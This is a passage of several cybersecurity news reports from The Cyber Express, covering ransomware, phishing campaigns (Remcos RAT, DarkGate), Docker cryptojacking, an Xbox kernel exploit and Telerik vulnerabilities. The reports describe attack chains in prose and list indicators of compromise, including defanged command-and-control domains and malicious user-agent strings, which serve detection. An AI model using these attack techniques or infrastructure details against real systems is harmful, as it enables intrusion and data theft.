The notice appears to indicate that the breach stemmed from a third-party provider. The Cyber Express team has reached out to the Moreton Bay Council's Privacy Officer for further information on the breach, however no response has been received as of publication time. The potential scale of the data breach, as well as its impact on residents, is currently unknown. It is also unclear on how many individuals may have accessed the available data before the website had been temporarily taken down and subsequently limited. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In a bold attempt to redefine cloud security and privacy standards, Apple has unveiled Private Cloud Compute (PCC), a groundbreaking cloud intelligence system designed to back its new Apple Intelligence with safety and transparency while integrating Apple devices into the cloud. The move comes after recognition of the widespread concerns surrounding the combination of artificial intelligence and cloud technology.

Private Cloud Compute Aims to Secure Cloud AI Processing

Apple has stated that its new Private Cloud Compute (PCC) is designed to enforce privacy and security standards over AI processing of private information. For the first time ever, Private Cloud Compute brings the same level of security and privacy that our users expect from their Apple devices to the cloud," said an Apple spokesperson. [caption id="attachment_76690" align="alignnone" width="1492"] Source: security.apple.com[/caption] At the heart of PCC is Apple's stated commitment to on-device processing. When Apple is responsible for user data in the cloud, we protect it with state-of-the-art security in our services," the spokesperson explained. "But for the most sensitive data, we believe end-to-end encryption is our most powerful defense." Despite this commitment, Apple has stated that for more sophisticated AI requests, Apple Intelligence needs to leverage larger, more complex models in the cloud. This presented a challenge to the company, as traditional cloud AI security models were found lacking in meeting privacy expectations. Apple stated that PCC is designed with several key features to ensure the security and privacy of user data, claiming the following implementations:

• Stateless computation: PCC processes user data only for the purpose of fulfilling the user's request, and then erases the data.
• Enforceable guarantees: PCC is designed to provide technical enforcement for the privacy of user data during processing.
• No privileged access: PCC does not allow Apple or any third party to access user data without the user's consent.
• Non-targetability: PCC is designed to prevent targeted attacks on specific users.
• Verifiable transparency: PCC provides transparency and accountability, allowing users to verify that their data is being processed securely and privately.

Apple Invites Experts to Test Standards; Online Reactions Mixed

At this week's Apple Annual Developer Conference, Apple's CEO Tim Cook described Apple Intelligence as a "personal intelligence system" that could understand and contextualize personal data to deliver results that are "incredibly useful and relevant," making "devices even more useful and delightful." Apple Intelligence mines and processes data across apps, software and services across Apple devices. This mined data includes emails, images, messages, texts, messages, documents, audio files, videos, contacts, calendars, Siri conversations, online preferences and past search history. The new PCC system attempts to ease consumer privacy and safety concerns. In its description of 'Verifiable transparency,' Apple stated:

"Security researchers need to be able to verify, with a high degree of confidence, that our privacy and security guarantees for Private Cloud Compute match our public promises. We already have an earlier requirement for our guarantees to be enforceable. Hypothetically, then, if security researchers had sufficient access to the system, they would be able to verify the guarantees."

However, despite Apple's assurances, the announcement of Apple Intelligence drew mixed reactions online, with some already likening it to Microsoft's Recall. In reaction to Apple's announcement, Elon Musk took to X to announce that Apple devices may be banned from his companies, citing the integration of OpenAI as an 'unacceptable security violation.' Others have also raised questions about the information that might be sent to OpenAI. [caption id="attachment_76692" align="alignnone" width="596"] Source: X.com[/caption] [caption id="attachment_76693" align="alignnone" width="418"] Source: X.com[/caption] [caption id="attachment_76695" align="alignnone" width="462"] Source: X.com[/caption] According to Apple's statements, requests made on its devices are not stored by OpenAI, and users’ IP addresses are obscured. Apple stated that it would also add “support for other AI models in the future.” Andy Wu, an associate professor at Harvard Business School, who researches the usage of AI by tech companies, highlighted the challenges of running powerful generative AI models while limiting their tendency to fabricate information. “Deploying the technology today requires incurring those risks, and doing so would be at odds with Apple’s traditional inclination toward offering polished products that it has full control over.”   Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Researchers have discovered a new phishing campaign in which threat actors distribute the Remcos RAT malware within UUEncoding (UUE) file attachments in emails purporting to be about importing or exporting shipments. The UUEncoding (UUE) file attachments are compressed with Power Archiver, a proprietary and cross-platform archive utility that supports both Windows and MacOS.

Use of UUEncoding (UUE) Files to Distribute Remcos RAT Malware

Researchers from AhnLab discovered that the threat actors behind the campaign, use UUEncoding files with a .UUE extension, which are designed to encode binary data in plain text format. These file formats are suitable for attachment in e-mail or Usenet messages. The malicious .UUE files encode a VBS script attached in phishing emails. The threat actors seem to have leveraged the file format and encoding technique as an attempt to bypass detection. [caption id="attachment_76665" align="alignnone" width="1024"] Source: asec.ahnlab.com[/caption] When decoded, the VBS script is obfuscated, making it difficult for researchers to analyze. The script saves a PowerShell script into the %Temp% directory and executes it. The running script then downloads the Haartoppens.Eft file, which executes an additional PowerShell script. This script is also obfuscated and is designed to load a shellcode to the wab.exe process. [caption id="attachment_76666" align="alignnone" width="638"] Source: asec.ahnlab.com[/caption] The shellcode maintains its persistence by adding a registry key to the infected system, and then accesses a remote C&C server to load additional instructions. The instructions ultimately download the Remcos RAT malware for execution on infected systems.

Remcos RAT malware

The Remcos RAT collects system information from infected systems and stores keylogging data in the %AppData% directory. The malware then sends this data to the remote command-and-control (C&C) server, which is hosted through a DuckDNS domain. [caption id="attachment_76667" align="alignnone" width="894"] Source: asec.ahnlab.com[/caption] Remcos is a commercial remote access tool (RAT) that is advertised as a legitimate tool, but has been observed in numerous threat actor campaigns. Successful loading of Remcos opens a backdoor on targeted systems, allowing for complete control. The researchers have shared the following indicators to help detect and stop this campaign: IOCs (Indicators of Compromise)

• b066e5f4a0f2809924becfffa62ddd3b (Invoice_order_new.uue)
• 7e6ca4b3c4d1158f5e92f55fa9742601 (Invoice_order_new.vbs)
• fd14369743f0ccd3feaacca94d29a2b1 (Talehmmedes.txt)
• eaec85388bfaa2cffbfeae5a497124f0 (mtzDpHLetMLypaaA173.bin)

File Detection

• Downloader/VBS.Agent (2024.05.17.01)
• Data/BIN.Encoded (2024.05.24.00)

C&C (Command & Control) Servers

• frabyst44habvous1.duckdns[.]org:2980:0
• frabyst44habvous1.duckdns[.]org:2981:1
• frabyst44habvous2.duckdns[.]org:2980:0

The researchers also shared the following general recommendations to avoid similar phishing campaigns:

• Refrain from accessing emails from unknown sources.
• Refrain from running or enabling macro commands when accessing downloaded attachment files. Users can set programs to highest levels of security, as lower levels may automatically execute macro commands without displaying any notification.
•  Update anti-malware engines to their latest versions.

The UUE file format has previously been used in several malicious campaigns due to its ability to easily evade detection from security tools, with a researcher previously discovering a UUEncode vulnerability in the main Python program. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Both the clearnet domain as well as the onion darkweb domain of the infamous BreachForums appear to be down in a move that has confused both security researchers and cybercriminals. Attempting to visit these sites leads to a '502- Bad Gateway' error. While the site has suffered several disruptions due to law enforcement attempts to take down the site, no direct connection has been made to law enforcement activities so far.

BreachForums Down with '502- Bad Gateway' Error

BreachForums had earlier faced an official domain seizure by the FBI in a coordinated effort with various law enforcement agencies. However, shortly after, 'ShinyHunters' managed to recover the seized domains, with allegedly leaked FBI communications revealing they had lost control over the domain while the BreachForums staff claimed that it had been transferred to a different host. However, the site appears to be down again, but with no seizure notice present, leading to speculation over what has struck the site as well as its admin ShinyHunters. On X and LinkedIn, security researcher Vinny Troia claimed that ShinyHunters had made a direct message through Telegram indicating that he was retiring from the forums, as it was 'too much heat' and has shut it down. [caption id="attachment_76597" align="alignnone" width="1164"] Source: X.com[/caption] Both the researcher's X and LinkedIn post attribute this incident to the FBI 'nabbing' ShinyHunters, even congratulating the agency.

BreachForums Telegram Channels Deleted

Shortly after the official domains went down, several official Telegram accounts that were associated with Breach Forums, including the main announcement channel and the Jacuzzi 2.0 account, were deleted. Forum moderator Aegis stated in a PGP signed message that Shiny Hunters had been banned from Telegram. [caption id="attachment_76580" align="alignnone" width="349"] Source: Telegram[/caption] [caption id="attachment_76582" align="alignnone" width="525"] Source: Telegram[/caption] In a new 'Jacuzzi' Telegram channel created shortly afterwards, a pinned message appears to confirm that the administrator ShinyHunters had quit after wishing to no longer maintain the forum. The message affirms that Shiny had not been arrested, but rather quit, while the forum has not been officially seized but taken down. [caption id="attachment_76604" align="alignnone" width="799"] Source: Telegram[/caption] A while later, a database allegedly containing data from the 'breachforums.is' domain (the previous official domain associated with BreachForums before it shifted to the .st domain) had been circulating among Telegram data leak and sharing channels. Another threat actor stated that the circulating leaks were likely an attempt to gain attention and subscribers in light of recent events, stating that the info is unverified and password-protected. [caption id="attachment_76578" align="alignnone" width="670"] Source: Telegram[/caption] Several threat actors had attempted to use these disruptions to promote their own alternatives such as Secretforums and Breach Nation. However, the administrator Astounded, who owned Secretforums, had himself announced his retirement from involvement from forum activity recently. [caption id="attachment_76590" align="alignnone" width="388"] Source: Telegram[/caption] The threat actor USDoD still appears to be promoting their Breach Nation as an alternative to BreachForums, even appreciating the move as a take down of 'competitors.' [caption id="attachment_76593" align="alignnone" width="1150"] Source: X.com[/caption] These incidents, along with ShinyHunter's disappearance, the deletion/unavailability of official channels as well as the arrests and disruptions associated with the forums, raise uncertainty over the community's future prospects as well as larger implications for data leak sharing. This article will be updated as we gather more information on events surrounding BreachForums. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

While the new-generation Xbox One consoles have been out for a while, until recently there weren't any softmods (software modifications to make a system behave differently) for users. That has seemingly changed, as an individual has revealed the existence of a Kernel-level exploit along with a limited proof of concept. The method uses an easily-available app called 'Game Script' present on the Microsoft store.

'Game Script' Xbox Console Kernel-Level Exploit

carrot_c4k3, the individual behind the discovery, disclosed on X that the exploit, which is not a jailbreak, works against the System OS software that exists on newer Xbox consoles such as the Xbox One. System OS exists to enable developers to run a wide variety of applications on these consoles through the use of virtualization technology. Applications downloaded from the Microsoft Store run on this layer. Xbox users can typically gain access to this environment by enabling developer mode on their consoles. However, carrot_c4k3 stated that while the exploit allows full control over vm homebrews on retail Xbox, it did not enable the use of pirated software upon usage. The method currently relies on the Game Script UWA application available on the Microsoft Store, which allows users to run and execute custom languages on the devices. The exploit consists of two components:

1. User mode: Initial steps where the user gains native code execution in the context of UWP (Microsoft Store) applications.
2. Kernel exploit: In this step the user exploits a Kernel vulnerability on these devices to gain full read/write permissions, which would then enable them to elevate the privileges of a particular running process.

The proof of concept exploit shared on Github is currently limited within the context of UWP apps, which are more 'locked down.' However, carrot_c4k3 shared their intent to release another exploit for Xbox one/X series consoles by next month that would allow for full Kernel-level access over read/write permissions within the System OS environment. The full exploit is stated to rely on leaks within the 'NtQuerySystemInformation' component, which are not available on UWP apps. Hence, the user is developing an alternative exploit that does not rely on UWP apps. The exploit allows users to bypass the fees required to enable the developer mode on Xbox consoles, as well as grant them the ability to modify game save data on the devices, but does not allow for the modding of the actual games themselves. The modder also discussed the possibility of using the exploit to allow the usage of 'simple emulators' meant to emulate games intended for older devices. carrot_c4k3 admitted that the exploit could potentially be detected by Microsoft, recommending to perform it on a dedicated offline console instead.

Exploit Might Have Been Patched In Newer Xbox Firmware Versions

A set of steps to be performed for the hack was shared on the Xbox One Research Github page:

• Ensure your Xbox Live account Login-Type is configured as “No barriers” aka. auto-login with no password prompt
• Set your console as “Home Console” for this account
• Download the App Game Script
• Start the app (to ensure license is downloaded/cached)
• Take your console offline! To make extra sure it cannot reach the internet, set a manual primary DNS address of 127.0.0.1
• Get a device/microcontroller that can simulate a Keyboard (rubber ducky or similar) - otherwise you have to type a lot manually :D

The page states that the exploit is "likely to be patched soon (in next System Update)." A thread on GBAtemp.net, a forum for discussing various video game platforms, stated that the latest firmware update for the Xbox One console has reportedly already patched the exploit, making the firmware 10.0.25398.4478 the last exploitable version. While the full consequences of this exploit and the one that will be shared are unknown, it highlights the interest that console players have in bypassing manufacturer-intended device limits. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Microsoft and Google have announced plans to offer free or highly discounted cybersecurity services to rural hospitals across the United States. These initiatives come as the U.S. healthcare sector faces a surge in ransomware attacks that more than doubled last year, posing a serious threat to patient care and hospital operations. The program - developed in collaboration with the White House, the American Hospital Association, and the National Rural Health Association - aims to make rural hospitals less defenseless by providing them with free security updates, security assessments, and training for hospital staff.

Microsoft and Google Cybersecurity Plans for Rural Hospitals

Microsoft has launched a full-fledged cybersecurity program to meet the needs of rural hospitals, which are often more vulnerable to cyberattacks due to more limited IT security resources, staff and training than their urban peers. The program will deliver free and low-cost technology services, including:

• Nonprofit pricing and discounts of up to 75% on Microsoft's security products for independent Critical Access Hospitals and Rural Emergency Hospitals.
• Larger rural hospitals already equipped with eligible Microsoft solutions will receive free advanced security suites for free.
• Free Windows 10 security updates for participating rural hospitals for at least one year.
• Cybersecurity assessments and training are being made free to hospital employees to help them better manage system security.

Justin Spelhaug, corporate vice president of Microsoft Philanthropies, said in a statement, “Healthcare should be available no matter where you call home, and the rise in cyberattacks threatens the viability of rural hospitals and impact communities across the U.S. “Microsoft is committed to delivering vital technology security and support at a time when these rural hospitals need them most.” Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technologies, said in a statement:

“Cyber-attacks against the U.S. healthcare systems rose 130% in 2023, forcing hospitals to cancel procedures and impacting Americans’ access to critical care. Rural hospitals are particularly hard hit as they are often the sole source of care for the communities they serve and lack trained cyber staff and modern cyber defenses. President Biden is committed to every American having access to the care they need, and effective cybersecurity is a part of that. So, we’re excited to work with Microsoft to launch cybersecurity programs that will provide training, advice and technology to help America’s rural hospitals be safe online.”

Alongside Microsoft's efforts, Google also announced that it will provide free cybersecurity advice to rural hospitals and non-profit organizations while also launching a pilot program to match its cybersecurity services with the specific needs of rural healthcare facilities.

Plans Are Part of Broader National Effort

Rural hospitals remain one of the most common targets for cyberattacks, according to data from the National Rural Health Association. Rural hospitals in the U.S. serve over 60 million people living in rural areas, who sometimes have to travel considerable distance for care even without the inconvenience of a cyberattack. Neuberger stated, “We’re in new territory as we see ... this wave of attacks against hospitals.” Rick Pollack, president of the American Hospital Association, said, “Rural hospitals are often the primary source of healthcare in their communities, so keeping them open and safe from cyberattacks is critical. We appreciate Microsoft stepping forward to offer its expertise and resources to help secure part of America’s healthcare safety net.” The plans are a part of a broader effort by the United States government to direct private partners and tech giants such as Microsoft and Google to use their expertise to plug significant gaps in the defense of the healthcare sector. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

NHS Blood and Transplant (NHSBT) is urgently appealing for O blood-type donors across England after a ransomware attack affected several major London hospitals. The cyberattack caused significant disruption on the hospitals' ability to match patients' blood types, leading to an increased demand for O-positive and O-negative blood donations, which are safe for all patients. The public health institution is asking donors of these blood types to book appointments at any of the 25 NHS blood donor centers in England in order to boost limited stocks and ensure the availability of essential blood supplies to patients.

NHS Blood and Transplant's Urgent Appeal for Blood Donations

The recent cyberattack on the pathology firm Synnovis, believed to have been orchestrated by the Russian cybercriminal group Qilin, caused significant disruption to several London hospitals. As a result, affected hospitals have been unable to match patients' blood at the usual rates, leading to the declaration of a critical incident and the cancellation of scheduled blood transfusions. Gail Miflin, chief medical officer at NHS Blood and Transplant, emphasized the importance of O blood-type donations during this critical time. She called on existing O blood donors to book urgent appointments and encouraged potential new donors to find out their blood type and contribute to solving the shortage. During NHS National Blood Week, it was revealed that hospitals require three blood donations every minute. With around 13,000 appointments available nationwide this week, and 3,400 specifically in London, there are many opportunity for donors to come forward and contribute to blood availability. Stephen Powis, the medical director for NHS England, praised the resilience of NHS staff amid the cyberattack and urged eligible donors to come forward to one of the 13,000 available appointments in NHS blood donor centers across the country. To learn more and find details on how to donate, interested individuals are encouraged to search 'GiveBlood' online and on social media or visit Blood.co.uk. [caption id="attachment_76310" align="alignnone" width="2562"] Source: www.blood.co.uk[/caption]

Impact of the Cyberattack on London Hospitals

Several prominent London hospitals, including the King's College Hospital, Guy's and St Thomas', the Royal Brompton, and the Evelina London Children's Hospital, declared a critical incident following the cyberattack on the pathology firm Synnovis, which provides blood-testing facilities to these hospitals and several others in southeast London. The attack forced hospital staff to cancel health procedures such as cancer surgeries and transplants due to the unavailability of blood transfusion services after facing severe disruption. In a statement on its official website, an NHS London spokesperson stressed the importance of pathology services to health treatment procedures:

“NHS staff are working around the clock to minimise the significant disruption to patient care following the ransomware cyber-attack and we are sorry to all those who have been impacted. Pathology services are integral to a wide range of treatments and we know that a number of operations and appointments have been cancelled due to this attack. We are still working with hospitals and local GP services to fully assess the disruption, and ensure the data is accurate. In the meantime our advice to patients remains, if you have not been contacted please do continue to attend your appointments.”

A senior NHS manager disclosed to the Health Service Journal (HSJ) that the incident was “everyone’s worst nightmare.” As blood has a limited shelf life of 35 days, it is critical that these hospital stocks are continually replenished. More units of O-negative and O-positive blood will be required over the coming weeks to accommodate an anticipated increase in surgeries and procedures due to earlier delays. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A new cryptojacking attack campaign dubbed "Commando Cat" has been observed exploiting exposed Docker remote API servers to deploy cryptocurrency miners. Attack operations leverage legitimate Docker images from the open-source Commando project. Commando is a tool designed for on-demand docker image creation, aiding SysOps and DevOps professionals to quickly create them for operations.

Commando Cat Initial Access and Attack Sequence

The Commando Cat campaign identified by researchers from Trend Micro has been active since early 2024. The attack begins with a probe to the Docker Remote API server. If the server responds positively, the attackers create a container using the "cmd.cat/chattr" image. Once a suitable target is located, the attacker deploys a docker image named cmd.cat/chattr, which appears harmless at first glance but serves as a stepping stone for the subsequent stages of the attack. The "cmd.cat/chattr" image allows the attackers to employ techniques like chroot and volume binding to escape the docker container and bind the host system's root directory to the container's own /hs directory, thereby gaining unrestricted access to the host file system. The attackers also bind the Docker socket to the container, allowing them to manipulate Docker as if they were on the host machine itself. If the "cmd.cat/chattr" image isn't found, the attackers pull it from the cmd.cat repository. Once the image is in place, they create a Docker container, executing a base64-encoded script that downloads and executes a malicious binary from their command-and-control (C&C) server. The researchers identified the downloaded binary file as ZiggyStarTux, an open-source IRC botnet based on the Kaiten malware.

Commando Cat Detection and Mitigation

While the researchers noted that the campaign's C&C server was down during analysis, they noted several technical specifics from attack operations. Researchers have advised that potential misuse of DropBear SSH on TCP port 3022, along with use of the 1219 port for its C&C server, can help detect the presence of the malware. Unauthorized IRC communications along with these specific User-Agent strings are other indicators:

• HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)
• Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)

To prevent such attacks, organizations should adhere to Docker security best practices, including:

• Properly configuring Docker containers and APIs.
• Utilizing only official or certified Docker images.
• Running containers with non-root privileges.
• Limiting container access to trusted sources.
• Regularly performing security audits and scanning for suspicious docker containers.

Additionally the researchers have shared a more detailed list of indicators of compromise (IOCs) to help detect infections. The Commando Cat attack campaign underscores the risks associated with exposed Docker Remote API servers and the potential exploitation of open-source projects by threat actors. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Akira ransomware group claims on its dark web leak site to have compromised data from Panasonic Australia. Shortly after that announcement, Singapore authorities issued an advisory advising affected companies to not heed the ransomware group's demands, in response to local law firm Shook Lin & Bok confirming that it had been struck by the group. Panasonic Australia is a regional subsidiary of Panasonic Holdings Corporation headquartered in Japan. It manufactures electronic equipment and devices such as cameras, home equipment, sound equipment, personal care devices, power tools, and air conditioning. The Akira ransomware group has previously targeted several high-profile organizations while netting millions in ransom payments from affected victims.

Akira Ransomware Group Attack on Panasonic Australia

The ransomware group alleged that it had exfiltrated sensitive project information and business agreements from the electronics manufacturer Panasonic Australia. No sample documents were posted to verify the authenticity of the breach claims. The potential impact of the breach on Panasonic Australia is unknown but could present a serious liability for the confidentiality of the company's stolen documents.

Cyber Security Agency of Singapore Issues Advisory

Singapore's Cyber Security Agency (CSA) along with the country's Personal Data Protection Commission (PDPC) issued an advisory to organizations instructing them to report Akira ransomware attacks to respective authorities rather than paying ransom demands. The advisory was released shortly after an Akira ransomware group attack on the Shook Lin & Bok law firm. While the firm still continued to operate as normal, it had reportedly paid a ransom of US$1.4 million in Bitcoin to the group. The Akira ransomware group had demanded a ransom of US$2 million from the law firm earlier, which was then negotiated down after a week, according to the SuspectFile article. The Cyber Security Agency of Singapore (CSA) stated that it was aware of the incident and offered assistance to the law firm. However, it cautioned against similar payments from other affected victims. "Paying the ransom does not guarantee that the data will be decrypted or that threat actors will not publish your data," the agency stated. "Furthermore, threat actors may see your organisation as a soft target and strike again in the future. This may also encourage them to continue their criminal activities and target more victims." The Singaporean authorities offered a number of recommendations to organizations:

• Enforce strong password policies with at least 12 characters, using a mix of upper and lower case letters, numbers, and special characters.
• Implement multi-factor authentication for all internet-facing services, such as VPNs and critical system accounts.
• Use reputable antivirus or anti-malware software to detect ransomware through real-time monitoring of system processes, network traffic, and file activity. Configure the software to block suspicious files, prevent unauthorized remote connections, and restrict access to sensitive files.
• Periodically scan systems and networks for vulnerabilities and apply the latest security patches promptly, especially for critical functions.
• Migrate from unsupported applications to newer alternatives.
• Segregate networks to control traffic flow between sub-networks to limit ransomware spread. Monitor logs for suspicious activities and carry out remediation measures as needed.
• Conduct routine backups following the 3-2-1 rule: keep three copies of backups, store them in two different media formats, and store one set off-site.
• Conduct incident response exercises and develop business continuity plans to improve readiness for ransomware attacks.
• Retain only essential data and minimize the collection of personal data to reduce the impact of data breaches.

"Organisations should periodically scan their systems and networks for vulnerabilities and regularly update all operating systems, applications, and software by applying the latest security patches promptly, especially for functions critical to the business," the police, CSA and PDPC said in a joint statement. The criminal group had previously also come under the attention of various other governments and security agencies, with the FBI and CISA releasing a joint cybersecurity advisory as part of the #StopRansomware effort. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The University of Arkansas is spearheading a new collaborative effort with researchers and industry partners to address the rising risks and challenges associated with the deployment of solar systems. Historically, little attention has been paid to the risks within solar systems, as they weren't commonly deployed and most solar inverters were not connected to wider networks. However, the potential risks grow as more solar panels are installed and inverters become more advanced. Solar inverters act as the bridging interface between solar panels and the grid, with newer models allowing for monitoring and control. Solar inverters that are not updated or secure enough could potentially be intercepted and manipulated by attackers, allowing them to embed malicious code that could spread into the larger power system.

University of Arkansas Solar Inverter Cybersecurity Initiative

The new project led by the University of Arkansas is funded by the U.S. Department of Energy's Solar Energy Technologies Office (SETO) and aims to strengthen the cybersecurity measures of solar inverters. Solar inverters are used to convert direct current (DC) generated from solar panels into alternating current (AC) that can be used in households and within the energy grid. This effort involves collaboration among multiple universities, laboratories, and industry partners to develop custom-designed controls infused with multiple layers of cybersecurity protocols. [caption id="attachment_75768" align="alignnone" width="800"] Source: news.uark.edu[/caption] Researchers from these groups dismantled conventional commercial solar inverters, stripping away existing controls and technology. They then integrated work from different partners while implementing custom-designed controls designed with multiple additional layers of cybersecurity protocols. The University of Arkansas group then took to solar farms in order to subject these modified inverters to real-world conditions to test them and demonstrate the practicality of their cybersecurity measures. The collaborative partners for this project include the University of Georgia, Texas A&M Kingsville, University of Illinois Chicago, Argonne National Laboratory, National Renewable Energy Laboratory, General Electric Research, Ozarks Electric, and Today's Power Inc. The collaborative efforts from these groups is a further step to fortifying not only the cybersecurity resilience of solar inverters but also to secure the broader landscape of renewable energy technologies.

Securing Renewable Energy and Electric Grids

As electric grids become increasingly digitized and connected, securing these grids becomes a top priority for the U.S. Department of Energy (DOE). The department has stated that while some cyberattacks target information technology (IT) systems, attacks on operating technology (OT) devices such as solar photovoltaic inverters could have potential physical impact, such as loss of power and creation of fires. The department cited an incident in March 2019 in which hackers managed to breach through a utility’s web portal firewall. The attack caused random interruptions to the visibility of segments of the grid from its operators for a period of 10 hours. The DOE's Solar Energy Technologies Office (SETO) is working to ensure that the electric grid is secure and capable of integrating more solar power systems and other distributed energy resources. The agency developed a roadmap for Photovoltaic Cybersecurity, supports ongoing efforts in Distributed Energy Resources (DER) cybersecurity standards, and participates in the Office of Energy Efficiency and Renewable Energy's Cybersecurity Multiyear Program Plan, along with the Department of Energy's broader cybersecurity research activities. The Solar Energy Technologies Office has recommended the use of dynamic survival strategy based on defense-in-depth measures that functional as additional layers of security to secure individual components as well as entire systems. These layers include installing anti-virus software on DER systems (solar inverters and battery controllers) and maintaining virus protection and detection mechanisms on the firewalls and servers integrating these individual systems to the broader system of grid operation. The Office admits that implementation of this strategy into DER technologies can be complex, with different owners, operators, and systems typically involved, but maintains the strategy's importance in reducing potential cyberattacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

On March 20, 2024, Progress Software disclosed three vulnerabilities in its Telerik Report Server products. The vulnerabilities were identified as CVE-2024-1800, CVE-2024-1801, and CVE-2024-1856. Another Progress Telerik Report Server vulnerability (CVE-2024-4358), disclosed on May 31, 2024, could potentially allow attackers to execute code on systems that have the affected Progress Telerik software versions installed. The Center for Cybersecurity Belgium issued a recent security advisory urging customers to patch these vulnerabilities.

Progress Telerik Vulnerabilities Overview

The CCB detailed all four vulnerabilities, associated risks and working exploits, and provided links that contain additional details about each vulnerability.

Insecure Deserialization Vulnerabilities

The first two vulnerabilities (CVE-2024-1801 and CVE-2024-1856) are insecure deserialization vulnerabilities in Progress Telerik Reporting. Attackers could exploit these vulnerabilities to run arbitrary code. An attacker with local access could potentially exploit CVE-2024-1801, while CVE-2024-1856 may be exploited remotely if specific web application misconfigurations are in place.

Remote Code Execution Vulnerability

The third vulnerability (CVE-2024-1800) is an insecure deserialization vulnerability in the Progress Telerik Report Server. Successfully exploitation of the vulnerability could allow for remote execution of arbitrary code on affected systems. Progress Telerik Report Server versions prior to 2024 Q1 (10.0.24.130) are vulnerable to this issue.

Authentication Bypass Vulnerability

An additional vulnerability, CVE-2024-4358, that was disclosed later affects the Telerik Report Server. This is an authentication bypass vulnerability that could allow an unauthenticated attacker to gain access to restricted functionality within the Progress Telerik Report Server. The issue affects Progress Telerik Report Server versions up to 2024 Q1 (10.0.24.305).

Recommended Actions for Telerik Vulnerabilities

The Centre for Cybersecurity Belgium strongly recommends applying, after thorough testing, the latest available software updates of Progress Telerik on vulnerable devices. Progress Telerik has explicitly stated that the only way to remediate the earlier three reported vulnerabilities was by updating to the latest available version (10.1.24.514). For the authentication bypass vulnerability (CVE-2024-4358), Progress Telerik has published a temporary mitigation. This mitigation involves applying a URL Rewrite rule in IIS to deny access to the vulnerable "startup/register" path. The Centre for Cybersecurity Belgium urges organizations to bolster their monitoring and detection capabilities to be alert for any malicious activities associated with these vulnerabilities. Organizations are further advised to check the list of users within the Progress Telerik Report Server to ensure that there is no addition of unauthorized accounts while responding quickly to detected intrusions. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Security researchers have uncovered a new phishing campaign that attempts to trick recipients into pasting (CTRL+V) and executing malicious commands on their system. It leverages a sophisticated attack chain along with what the researchers have dubbed the "paste and run" technique.

'Paste and Run' Phishing Technique

The attackers behind the campaign send emails to potential victims purporting to be from legitimate businesses or organizations. Researchers from AhnLab stated that these emails often involve topics such as fee processing or operational instructions to entice recipients into opening attached files. The emails contain a file attachment with disguised intent, as in the examples below. [caption id="attachment_75497" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] Once the victim clicks on the HTML attachment, a fake message displays in the browser while disguising itself as a Microsoft Word document. This message directs the user to click on a "How to fix" button that purports to help them load the document offline. After clicking the button, a set of instructions prompt the user to type out a set of keyboard commands—first type [Win+R], then [Ctrl+V], and press [Enter]. [caption id="attachment_75494" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] The button may alternatively load a different set of instructions directing the user to manually access the Windows PowerShell terminal and hit right-click within the terminal window. By following the instructions, the victim inadvertently pastes a malicious script to the terminal, which then executes in their system.

Phishing Scheme Installs DarkGate Malware

The PowerShell script downloaded and executed by the scheme is a component of the DarkGate malware family. Once the script is run, it downloads and executes an HTA (HTML Application) file from a remote command-and-control server. The HTA file then executes additional instructions to launch an AutoIt3.exe file while passing a malicious AutoIt script (script.a3x) as an argument. The script appears to load the DarkGate malware to infect the system while also clearing the user's clipboard to conceal the execution of malicious commands. "The overall operation flow from the reception of the email to the infection is quite complex, making it difficult for users to detect and prevent," the researchers noted. [caption id="attachment_75496" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption]

Protecting Against the Phishing Campaign

The researchers advised email recipients to remain cautious when handling unsolicited emails, even if they appear to be from legitimate sources, to avoid falling victim to the phishing campaign. Recipients should refrain from opening attachment files or clicking on links until they can verify the email sender and its content. "Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails," the researchers emphasized. Additionally, recipients should also be wary of any messages that prompt them to execute commands, as it is a common tactic used by attackers to compromise systems. Upon receiving such requests, it is recommended to either ignore the email or report it to your organization's IT security team. The researchers also shared various indicators of compromise (IOCs) such as Base64-encoded PowerShell commands, HTA files, and Autoit scripts, download URLs, file signatures and behavioral indicators associated with the campaign. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

